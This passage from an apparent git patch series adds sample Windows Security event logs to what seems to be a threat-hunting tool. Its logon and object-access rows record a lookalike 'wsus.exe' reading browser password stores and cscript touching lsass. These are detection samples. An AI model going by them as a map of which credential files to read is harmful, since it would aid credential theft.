0x8020000000000000 + + + 227762 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x14a321 + 10 + User32 + Negotiate + PC01 + AF83A89C-C68A-5397-5AC6-24A0C4D2BAF6 + - + - + 0 + 0x4b8 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 49274 + +" +2019-02-13T22:04:57.462400+04:00,1550081097.4624,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227747 + + + + + Security + PC01.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x148f5d + 3 + NtLmSsp + NTLM + PC02 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + +" +2019-02-13T22:04:45.905783+04:00,1550081085.905783,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227740 + + + + + Security + PC01.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x14871d + 3 + NtLmSsp + NTLM + PC02 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + +" +2019-02-13T22:02:05.418087+04:00,1550080925.418087,4624,user01,EXAMPLE,7,Negotiat,-,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227708 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x1414d9 + 7 + Negotiat + Negotiate + PC01 + 42DAF7A9-F185-F292-0EBD-B86A26624D31 + - + - + 0 + 0x208 + C:\Windows\System32\lsass.exe + - + - + +" +2019-02-13T22:02:04.436676+04:00,1550080924.436676,4624,user01,EXAMPLE,11,User32,127.0.0.1,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227701 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x1414c8 + 11 + User32 + Negotiate + PC01 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x704 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171296 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aadb8 + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62863 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171295 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aad4a + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62862 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171294 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aa47f + 3 + Kerberos + Kerberos + - + 27FCE179-F80F-F6A6-7DF4-C247E783B072 + - + - + 0 + 0x0 + - + ::1 + 62860 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171292 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c9a + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171291 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c80 + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60728 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171290 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" -- 2.34.1 From bb4797d25c59ad5d58e8c946fb8912d926c1746a Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:42:20 +0800 Subject: [PATCH 04/13] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index caf4ef0..68c4643 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,3 @@ # apt-hunter - +- When you upload the file path depth of 2 or more layers, please be sure to note that the file upload path '/' will be translated into the url '%2F' which will create a new folder! Be sure to pay attention! +- 当你上传的文件路径深度在2层及以上时,请一定要注意文件上传路径'/' 会被url 翻译为 '%2F' 这样会新建一个文件夹!一定要注意! \ No newline at end of file -- 2.34.1 From 3fe803767b891a90343ea4ca326247f45430009e Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:43:35 +0800 Subject: [PATCH 05/13] ADD file via upload --- .../samples/Sample_Object_Access_Events.csv | 14715 ++++++++++++++++ 1 file changed, 14715 insertions(+) create mode 100644 source/samples/Sample_Object_Access_Events.csv diff --git a/source/samples/Sample_Object_Access_Events.csv b/source/samples/Sample_Object_Access_Events.csv new file mode 100644 index 0000000..01dbd53 --- /dev/null +++ b/source/samples/Sample_Object_Access_Events.csv @@ -0,0 +1,14715 @@ +Date and Time,timestamp,Event ID,Account Name,Object Name,Object Type,Process Name,Computer Name,Channel,Original Event Log +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 